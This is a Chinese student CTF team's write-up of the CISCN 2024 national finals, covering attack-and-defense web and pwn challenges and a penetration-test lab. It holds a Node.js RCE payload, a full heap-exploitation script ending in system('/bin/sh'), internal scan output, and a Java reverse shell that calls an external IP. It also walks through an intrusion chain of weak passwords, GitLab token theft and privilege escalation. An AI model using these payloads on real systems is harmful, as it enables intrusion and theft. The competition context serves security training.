第十七届全国大学生信息安全竞赛创新实践能力赛总决赛WriteUp——By圣地亚哥皮蛋战队:
好久没发公众号,先浅浅抒情几笔:
一路走来,代代相承,虽历经风风雨雨,但也从未浇灭皮蛋们那一颗热爱网络安全的心……
这里先祝福一下即将要前往下一站的sp4c1ous、Cat、AndyNoel三位在皮蛋厂生活了四年的老师傅们,没有轰轰烈烈的退役仪式,但是时代的接力棒悄然而至,这里我们共同举杯:敬来时路,敬同归人,江湖路远,各自珍重。圣地亚哥皮蛋厂始终是你们的最纯粹的家,记得常回家看看。
长江后浪推前浪,愿每一个热爱网络安全的少年都能找到属于自己的归宿,愿圣地亚哥皮蛋战队在未来的道路上越走越远。
--来自Ic4_F1ame师傅
然后再来聊一聊这次紧张刺激的国赛:
主队非常幸运的派出了豪华的2Web+2Pwn银河战舰阵容,顺利的从华东北赛区突围来到了决赛的赛场,经过决赛两天的鏖战,每个人也算是稳定发挥,刷新了CISCN最好成绩,拿到了圣地亚哥皮蛋战队第一个CISCN的国家级一等奖。(PS:成功操办了fakes0u1师傅的退役之战,完结撒花,希望师傅出走半年(就半年,不能再多了),归来还能再战
CISCN2024 AWDP:
Awdp开局还是反应的慢了一些,很多题目都是后面几轮才修上的,开启了漫长的追分之路,从30名一点点往前追,最后成绩也算是符合预期了
Web:
ezjs:
fix:
考了一个js的文件上传渲染,这里过滤js的文件后缀即可:
break:
admın绕过登陆
利用express解析的一个trick 当我们可以对node_modules文件进行操作的时候 我们可以通过往里面写index.js从而实现rce
首先在upload上传
exports.__express = function() {
console.log(require('child_process').execSync("cat /flag > /app/views/upload.ejs").toString());
}
然后通过rename目录穿越
写到 ../node_modules/ttt/index.js中
然后再上传一个ttt后缀的文件
在render处渲染该文件 随后访问upload路由即可
SolonMaster:
fix
打java反序列化,序列化字符串内容由data传入,先将data解码之后,检测data中的文件内容
查看依赖包,看到的了logback和snackyaml的依赖,即检测序列化中是否存在这两个类,如果存在就检测过滤:
byte[] decodemsg = Base64.getDecoder().decode((String)map.get("data"));
String sea = new String(decodemsg);
if(sea.contains("snack")){
return "filtered";
}
else if(sea.contains("log")){
return "filterd";
}
ShareCard:
fix
Class Info那里存在任意文件读取,可以进行目录穿梭,对self.avatar进行过滤,将目录穿梭的../分开进行过滤,同时过滤其url编码的绕过形式:
def parse_avatar(self):
if '..' in self.avatar or '/' in self.avatar or '%2e' in self.avatar:
self.avatar = ''
self.avatar = base64.b64encode(open('avatars/'+self.avatar,'rb').read()).decode()
break:
大概思路应该是通过key进行jwt伪造,将路径伪造成穿梭之后的,但是key发现是个RSA.random,本地调试了一下感觉像伪随机数,但是没有密码手,找不到key也就没再往下做了
Pwn:
ezheap
break
根据数据格式来去申请chunk,然后利用uaf打system(“/bin/sh”)即可
import os
import requests
import sys
import time
from pwn import *
from ctypes import *
from requests.auth import*
context.os = 'linux'
context.log_level = "debug"
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'x00'))
uu64 = lambda data :u64(data.ljust(8,b'x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil("x7f")[-6:].ljust(8,b"x00"))
l32 = lambda :u32(p.recvuntil("xf7")[-4:].ljust(4,b"x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']
x64_32 = 1
if x64_32:
context.arch = 'amd64'
else:
context.arch = 'i386'
#p=remote("123.57.149.79",21722)
p=process('./pwn')
elf = ELF('./pwn')
libc=ELF('./libc.so.6')
libc = ELF("./libc.so.6")
def add(idx,size,content):
p.sendlineafter("Please input:",'{"choice":"new","index":'+ str(idx)+',"length":' + str(size) + ',"message":"' + content + '"}')
def delete(idx):
p.sendlineafter("Please input:",'{"choice":"rm","index":'+ str(idx)+',"length":0,"message":"0"}')
def edit(idx,size,content,mode=0):
p.sendlineafter("Please input:",'{"choice":"modify","index":'+ str(idx)+',"length":' + str(size) + ',"message":"' + content + '"}')
def show(idx):
p.sendlineafter("Please input:",'{"choice":"view","index":'+ str(idx)+',"length":0,"message":"0"}')
def duan():
gdb.attach(p)
pause()
add(0,0x110,"AAAAAAA")
add(1,0x110,"AAAAAAA")
add(4,0x400,"BBBBBBB")
add(5,0x400,"BBBBBBB")
delete(0)
delete(1)
show(1)
#duan()
p.recvuntil("message:")
heap_addr = u64(p.recv(6).ljust(0x8,b"x00")) - 0x4f0
leak("heap_addr ",heap_addr)
edit(2,0x65a,"A"*0x658+"x61x05")
delete(3)
add(0,0x30,"A"*7)
edit(4,0x8,"A"*8)
show(4)
libc.address = u64(p.recvuntil("x7f")[-6:].ljust(0x8,b"x00")) - 0x1ecbe0
leak("libc.address ",libc.address)
system = libc.sym['system']
p.sendlineafter("Please input:",b'{"choice":"modify","index":1,"length":6,"message":"' + p64(libc.sym['__free_hook'])[:6] + b'"}')
add(0,0x110,"/bin/sh")
p.sendlineafter("Please input:",b'{"choice":"new","index":1,"length":272,"message":"' + p64(system)[:6] + b'"}')
delete(5)
itr()
fix
直接修改uaf,利用eh_frame修改即可
anime
fix
直接改printf为puts即可
CHR
fix
直接把那个4去掉就行
CISCN2024 渗透:
erp
heapdump泄露shirokey 注入冰蝎马rce
内网信息搜集
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.8.146 netmask 255.255.255.0 broadcast 192.168.8.255
inet6 fe80::216:3eff:fe04:a6cd prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:a6:cd txqueuelen 1000 (Ethernet)
RX packets 74969 bytes 52704643 (52.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 41507 bytes 34324294 (34.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 21642 bytes 1774091 (1.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21642 bytes 1774091 (1.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
192.168.8.42:80 open
192.168.8.9:80 open
192.168.8.42:22 open
192.168.8.146:22 open
192.168.8.26:139 open
192.168.8.16:139 open
192.168.8.12:139 open
192.168.8.38:139 open
192.168.8.9:139 open
192.168.8.26:135 open
192.168.8.16:135 open
192.168.8.38:135 open
192.168.8.12:135 open
192.168.8.9:135 open
192.168.8.26:445 open
192.168.8.16:445 open
192.168.8.38:445 open
192.168.8.12:445 open
192.168.8.9:445 open
192.168.8.38:3306 open
192.168.8.9:1433 open
192.168.8.146:8080 open
192.168.8.9:8000 open
192.168.8.12:88 open
192.168.8.16:8080 open
192.168.8.26:8080 open
192.168.8.9:8172 open
192.168.8.42:8060 open
192.168.8.42:9094 open
[*] NetInfo
[*]192.168.8.9
[->]WIN-IISSERER
[->]192.168.8.9
[*] WebTitle http://192.168.8.146:8080 code:302 len:0 title:None 跳转url: http://192.168.8.146:8080/login;jsessionid=F139BD9ACD9AAD76CC4B5499F309C340
[*] WebTitle http://192.168.8.9 code:200 len:43679 title:VertexSoft
[*] NetInfo
[*]192.168.8.12
[->]RODC
[->]192.168.8.12
[*] NetInfo
[*]192.168.8.16
[->]WIN-SERVER03
[->]192.168.8.16
[*] NetBios 192.168.8.26 WORKGROUPWIN-PC3788
[*] NetBios 192.168.8.16 WORKGROUPWIN-SERVER03
[*] NetBios 192.168.8.12 [+] DC:VERTEXSOFTRODC
[*] NetBios 192.168.8.38 WORKGROUPWIN-OPS88
[*] NetBios 192.168.8.9 WORKGROUPWIN-IISSERER
[*] NetInfo
[*]192.168.8.26
[->]WIN-PC3788
[->]192.168.8.26
[*] WebTitle http://192.168.8.9:8000 code:200 len:4018 title:Modbus Monitor - VertexSoft Internal Attendance System
[*] WebTitle http://192.168.8.42:8060 code:404 len:555 title:404 Not Found
[*] NetInfo
[*]192.168.8.38
[->]WIN-OPS88
[->]192.168.8.38
[*] WebTitle http://192.168.8.146:8080/login;jsessionid=F139BD9ACD9AAD76CC4B5499F309C340 code:200 len:1383 title:Master ERP login Form
[*] WebTitle http://192.168.8.42 code:302 len:99 title:None 跳转url: http://192.168.8.42/users/sign_in
[*] WebTitle https://192.168.8.9:8172 code:404 len:0 title:None
[*] WebTitle http://192.168.8.26:8080 code:200 len:147 title:第一个 JSP 程序
[*] WebTitle http://192.168.8.16:8080 code:403 len:594 title:None
[*] WebTitle http://192.168.8.42/users/sign_in code:200 len:11166 title:登录 · GitLab
[+] PocScan http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
jenkins
jenkins 弱口令 admin admin123登陆后台 直接可以执行命令
反弹shell
String host="8.130.87.84";
int port=6666;
String cmd="cmd.exe";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
gitlab
jenkins后台获取gitlab Token 直接可以窃取gitlab仓库内容
WIN-OPS88
mysql弱口令 udf提权一把梭
RODC
在mysql机的administrator用户的document目录下 存在excel表
直接rdp远程登陆192.168.8.12
只读域控可以直接读取administritor下的flag文件
WIN-PC3788
tomcat存在漏洞 可以通过PUT上传木马文件 ,getshell后potato提权获取flag
写在后面:
马上又要进行2024级新生的纳新了,如果你对网络安全感兴趣,那么可以到网络空间安全实验室感受极致的黑客世界,圣地亚哥皮蛋战队期待你的加入。
纳新群号:672243432
纳新群二维码:
原文始发于微信公众号(山警网络空间安全实验室):第十七届全国大学生信息安全竞赛创新实践能力赛总决赛WriteUp——By圣地亚哥皮蛋战队
